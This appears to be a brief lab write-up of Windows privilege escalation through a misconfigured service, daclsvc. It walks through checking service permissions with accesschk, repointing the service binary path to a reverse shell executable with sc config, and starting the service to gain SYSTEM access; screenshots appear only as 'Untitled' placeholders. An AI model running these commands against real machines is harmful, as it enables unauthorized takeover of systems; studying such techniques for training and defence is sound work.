now first of all we have the service daclsvc let’s check it’s permission using accesschk.exe

.\\accesschk /accepteula -uwcqv daclsvc

Untitled

as we see we have SERVICE_CHANGE_CONFIG delegation which mean we can change the abuse the service to point to our malicious reverse shell

sc qc daclsvc

Untitled

as we see the service is running with system privileges

so now let’s start to abuse it

sc config daclsvc binpath= "\\"C:\\Users\\user\\shell.exe""

as we see we modified the service binary path to point to out reverse shell so let’s open a listener and then run the service

net start daclsvc

Untitled

now take a look at our reverse shell

Untitled

and as we see we are authority system